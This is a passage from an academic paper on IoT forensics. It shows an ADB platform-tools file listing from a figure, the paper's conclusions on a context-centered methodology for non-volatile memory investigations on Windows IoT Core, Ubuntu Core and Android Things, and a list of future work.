api	0	Directory
lib64	0	Directory
systrace	0	Directory
adb.exe	2,583	Regular File
AdbWinApi.dll	96	Regular File
AdbWinUsbApi.dll	62	Regular File
dmtracedump.exe	241	Regular File
etc1tool.exe	415	Regular File
fastboot.exe	1,322	Regular File
hprof-conv.exe	41	Regular File
libwinpthread-1.dll	228	Regular File
make_f2fs.exe	467	Regular File
mke2fs.conf	2	Regular File
mke2fs.exe	723	Regular File
NOTICE.txt	290	Regular File
source.properties	1	Regular File
sqlite3.exe	1,336	Regular File

Figure 19 Last execution date for the ADB executable found on the control device

purpose for which the devices were designed. Under these circumstances, new methodologies are needed in order to guarantee complete and useful investigations in the IoT environment. Furthermore, these guidelines will set the standards of admissibility in a court of law,

something that, if done inappropriately, will complicate the examinations immensely.

In addition, from the study of the characteristics of the IoT environment it has also been demonstrated that, due to the heterogeneity of the scenario, a different

approach is needed in the design of the new methodologies. The multiplicity of contexts in which IoT devices are present makes the development of a general methodology which could fulfil the requirements of every one of them an unrealistic goal; a fact that is confirmed by the few number of frameworks and methodologies developed by the community, which, even though they provide a good starting point, fail to present a perfect depiction of the scenarios in IoT forensics. Therefore, a context-centered approach might be the most appropriate option to ensure the usefulness of the proposals.

Consequently, a context-centered methodology for IoT investigations has been developed. This proposal is focused on addressing non-volatile memory examinations in a context delimited by three operating systems with similar characteristics and purpose, namely Windows IoT Core, Ubuntu Core and Android Things, and topologies in which a central node manages the petitions of the network, in which other devices such as sensors or actuators can be present.

With the design of this methodology, the lack of tools specifically designed for the IoT to perform investigations has also been confirmed, an issue that reduces the usefulness of the proposals. In this case, it has been detrimental for the feasibility of the live acquisition process in Windows 10 IoT Core.

The practicality of the proposal has been evaluated by carrying out different investigations, in which various security incidents that could present in real life and required a forensic examination were simulated. The results of the tests prove the usefulness of the designed methodology and verify that it is suitable for use in real life investigations. In addition, the flexibility of the methodology provides the possibility of future similar operating systems being modelled by it.

7.1 Future Work

As mentioned above, this work is a starting point for the development of methodologies for IoT forensics. Methodologies have proven to be essential throughout forensic history, and their adaptation to the new environments and their continued improvement mean that there is a wide spectrum of research to cover. Some of the future projects could be the following:

- Study the modelling of methodologies to conduct forensic investigations of the volatile memory of IoT devices. In particular, it would be interesting to address the context that has been modelled in this proposal in order to create a complete methodology that addresses both the volatile and non-volatile memory.
- Develop tools to automatize some of the phases described in this methodology and address the lack of IoT-centered forensic ones.
- Propose frameworks that comply with the existing methodologies designed for IoT, also taking into account the perspective of Digital Forensic as a Service (DFaaS), which has gained relevance in recent years.
- Broaden the forensic analysis of systems and devices in different contexts, especially the most commonly used ones. Understanding what evidence can be retrieved from a device and how to do so is the basis for the design of methodologies, and there are still a lot of contexts to be addressed.
- Perform further studies based on comprehending the interaction between IoT devices in an environment. Connectivity is the most distinctive and important feature of the IoT, and methodologies must be designed with that in mind.

8 Compliance with Ethical Standards

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